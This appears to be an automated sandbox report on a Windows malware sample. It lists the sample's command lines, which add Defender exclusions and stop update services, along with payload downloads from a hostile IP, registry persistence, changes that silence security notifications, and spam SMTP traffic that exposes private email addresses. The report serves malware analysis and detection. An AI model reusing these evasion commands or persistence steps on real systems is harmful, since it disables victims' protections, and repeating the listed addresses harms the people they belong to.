Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 26, 2024, 11:57 a.m. | July 26, 2024, noon |
Process | Command Line | PID |
---|---|---|
cmd.exe | "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" | 2156 |
powershell.exe | powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" | 2276 |
cmd.exe | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS | 2200 |
Name | Response | Post-Analysis Lookup |
---|---|---|
mx2c1.comcast.net | 96.102.18.146 | |
aim.com | MX mx-aol.mail.gm0.yahoodns.net | 13.248.158.7 |
ntlworld.com | MX mxin10.virginmedia.com, MX mxin5.virginmedia.com | 213.105.9.42 |
icanhazip.com | 104.16.184.241 | |
mx2.mxge.comcast.net | 96.102.18.147 | |
cox.net | MX cxr.mx.a.cloudfilter.net | 98.182.1.143 |
charter.net | MX mx0.charter.net | 99.83.251.242 |
mx1h1.comcast.net | 96.102.157.181 | |
comcast.net | MX mx1c1.comcast.net, MX mx2.mxge.comcast.net, MX mx1a1.comcast.net, MX mx1h1.comcast.net, MX mx2c1.comcast.net, MX mx1.mxge.comcast.net, MX mx2a1.comcast.net, MX mx2h1.comcast.net | 96.99.227.0 |
mx2h1.comcast.net | 96.102.157.180 | |
mx0.charter.net | 47.43.18.9 | |
optonline.net | MX mx.altice.prod.cloud.openwave.ai | 167.206.148.154 |
mx.altice.prod.cloud.openwave.ai | 65.20.63.100 | |
ff-ip4-mx-vip1.prodigy.net | 144.160.159.21 | |
verizon.net | MX mx-aol.mail.gm0.yahoodns.net | 72.21.81.253 |
mta6.am0.yahoodns.net | 67.195.228.106 | |
netzero.net | MX mx.dca.untd.com, MX mx.vgs.untd.com | 64.136.45.168 |
cxr.mx.a.cloudfilter.net | 34.212.80.54 | |
juno.com | MX mx.vgs.untd.com, MX mx.dca.untd.com | 64.136.53.46 |
www.update.microsoft.com | 20.109.209.108 | |
yahoo.com | MX mta5.am0.yahoodns.net, MX mta7.am0.yahoodns.net, MX mta6.am0.yahoodns.net | 74.6.143.25 |
mail.com | MX mx00.mail.com, MX mx01.mail.com | 82.165.229.87 |
att.net | MX ff-ip4-mx-vip1.prodigy.net, MX ff-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip1.prodigy.net | 144.160.36.42 |
mx-aol.mail.gm0.yahoodns.net | 98.136.96.92 | |
mx01.mail.com | 74.208.5.22 | |
mx.dca.untd.com | 64.136.44.37 | |
mx1a1.comcast.net | 96.103.145.163 | |
al-ip4-mx-vip2.prodigy.net | 144.160.235.144 | |
al-ip4-mx-vip1.prodigy.net | 144.160.235.143 | |
mxin5.virginmedia.com | 84.116.6.18 | |
mx.vgs.untd.com | 64.136.52.37 | |
bellsouth.net | MX ff-ip4-mx-vip1.prodigy.net, MX ff-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip1.prodigy.net | 216.77.188.73 |
sbcglobal.net | MX ff-ip4-mx-vip1.prodigy.net, MX ff-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip2.prodigy.net, MX al-ip4-mx-vip1.prodigy.net | |
IP Address | Status | Action |
---|---|---|
104.16.185.241 | Active | Moloch |
109.74.35.21 | Active | Moloch |
109.74.43.21 | Active | Moloch |
144.160.159.21 | Active | Moloch |
144.160.235.143 | Active | Moloch |
144.160.235.144 | Active | Moloch |
151.241.237.185 | Active | Moloch |
164.124.101.2 | Active | Moloch |
185.215.113.66 | Active | Moloch |
194.93.26.210 | Active | Moloch |
195.158.22.13 | Active | Moloch |
2.185.163.114 | Active | Moloch |
20.109.209.108 | Active | Moloch |
213.230.90.222 | Active | Moloch |
217.30.160.154 | Active | Moloch |
35.162.106.154 | Active | Moloch |
47.43.18.9 | Active | Moloch |
5.238.186.28 | Active | Moloch |
64.136.44.37 | Active | Moloch |
64.136.52.37 | Active | Moloch |
65.20.63.100 | Active | Moloch |
67.195.204.75 | Active | Moloch |
67.195.204.80 | Active | Moloch |
67.195.228.111 | Active | Moloch |
74.208.5.22 | Active | Moloch |
77.221.27.219 | Active | Moloch |
77.91.77.92 | Active | Moloch |
78.85.106.173 | Active | Moloch |
83.239.55.170 | Active | Moloch |
84.116.6.18 | Active | Moloch |
86.62.3.154 | Active | Moloch |
95.58.72.245 | Active | Moloch |
95.59.4.234 | Active | Moloch |
96.102.157.180 | Active | Moloch |
96.102.157.181 | Active | Moloch |
96.102.18.146 | Active | Moloch |
96.102.18.147 | Active | Moloch |
96.103.145.163 | Active | Moloch |
98.136.96.92 | Active | Moloch |
98.136.96.93 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/1 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/ns/n.txt |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/2 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/ns/91.txt |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/3 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/4 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/5 |
request | GET http://185.215.113.66/1 |
request | GET http://icanhazip.com/ |
request | GET http://185.215.113.66/ns/n.txt |
request | GET http://185.215.113.66/2 |
request | GET http://185.215.113.66/ns/91.txt |
request | GET http://185.215.113.66/3 |
request | GET http://185.215.113.66/4 |
request | GET http://185.215.113.66/5 |
ip | 109.74.35.21 |
ip | 109.74.43.21 |
ip | 194.93.26.210 |
ip | 195.158.22.13 |
ip | 2.185.163.114 |
ip | 213.230.90.222 |
ip | 217.30.160.154 |
ip | 5.238.186.28 |
ip | 77.221.27.219 |
ip | 78.85.106.173 |
ip | 95.58.72.245 |
description | sysarddrvs.exe tried to sleep 209 seconds, actually delayed analysis time by 209 seconds |
domain | icanhazip.com |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
cmdline | cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe |
cmdline | cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | sc stop UsoSvc |
cmdline | sc stop DoSvc |
cmdline | sc stop WaaSMedicSvc |
cmdline | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | sc stop BITS |
cmdline | sc stop wuauserv |
Receiver | Sender | Server |
---|---|---|
[] | [] | 67.195.228.111 |
[] | [] | 35.162.106.154 |
[] | [] | 96.102.157.181 |
[] | [] | 35.162.106.154 |
[] | [] | 96.102.18.147 |
[] | [] | 35.162.106.154 |
[] | [] | 65.20.63.100 |
[] | [] | 65.20.63.100 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [] | 74.208.5.22 |
[] | [] | 74.208.5.22 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [u'gris.mora@sbcglobal.net'] | 144.160.159.21 |
[] | [u'joelcisneros@sbcglobal.net'] | 144.160.159.21 |
[] | [] | 96.102.157.181 |
[] | [u'kathleenteall@att.net'] | 144.160.235.143 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [u'par1202@att.net'] | 144.160.235.143 |
[] | [u'bridget.harper@sbcglobal.net'] | 144.160.159.21 |
[] | [] | 84.116.6.18 |
[] | [] | 74.208.5.22 |
[] | [] | 96.102.157.181 |
[] | [] | 84.116.6.18 |
[] | [u'lordsonny@sbcglobal.net'] | 144.160.159.21 |
[] | [u'briggan@att.net'] | 144.160.235.143 |
[] | [] | 96.102.157.181 |
[] | [] | 65.20.63.100 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [u'shan_white@sbcglobal.net'] | 144.160.159.21 |
[] | [] | 96.102.157.181 |
[] | [u'eatatum@att.net'] | 144.160.235.143 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [] | 96.102.157.181 |
[] | [u'eandjkirkland@att.net'] | 144.160.235.143 |
[u'gmbeck1@verizon.net'] | [u'gmbeck1@verizon.net'] | 98.136.96.93 |
[] | [] | 96.102.157.181 |
[u'mguers4@verizon.net'] | [u'mguers4@verizon.net'] | 98.136.96.93 |
[] | [] | 35.162.106.154 |
[u'awwitskittenx@aim.com'] | [u'awwitskittenx@aim.com'] | 98.136.96.93 |
[] | [] | 96.102.157.181 |
[u'bluesniper911@aim.com'] | [u'bluesniper911@aim.com'] | 98.136.96.93 |
[] | [] | 96.102.157.181 |
[] | [] | 84.116.6.18 |
host | 109.74.35.21 |
host | 109.74.43.21 |
host | 151.241.237.185 |
host | 185.215.113.66 |
host | 194.93.26.210 |
host | 195.158.22.13 |
host | 2.185.163.114 |
host | 213.230.90.222 |
host | 217.30.160.154 |
host | 5.238.186.28 |
host | 77.221.27.219 |
host | 77.91.77.92 |
host | 78.85.106.173 |
host | 83.239.55.170 |
host | 86.62.3.154 |
host | 95.58.72.245 |
host | 95.59.4.234 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings | reg_value | C:\Windows\sysarddrvs.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride |
file | C:\Users\test22\AppData\Local\Temp\newtpp.exe:Zone.Identifier |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe:Zone.Identifier |
file | C:\Windows\sysarddrvs.exe:Zone.Identifier |
description | attempts to disable antivirus notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride |
description | attempts to disable antivirus notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify |
description | attempts to disable firewall notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify |
description | attempts to disable firewall notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride |
description | attempts to disable windows update notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify |
service | wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start) |
service | BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start) |
dead_host | 95.59.4.234:40500 |
dead_host | 35.162.106.154:25 |
dead_host | 47.43.18.9:25 |
dead_host | 77.91.77.92:80 |
dead_host | 151.241.237.185:40500 |
dead_host | 64.136.44.37:25 |
dead_host | 96.102.157.180:25 |
dead_host | 84.116.6.18:25 |
dead_host | 192.168.56.103:50204 |
dead_host | 192.168.56.103:50121 |
dead_host | 65.20.63.100:25 |
dead_host | 96.103.145.163:25 |
dead_host | 83.239.55.170:40500 |
dead_host | 74.208.5.22:25 |
dead_host | 86.62.3.154:40500 |
dead_host | 96.102.18.147:25 |
dead_host | 64.136.52.37:25 |
dead_host | 96.102.157.181:25 |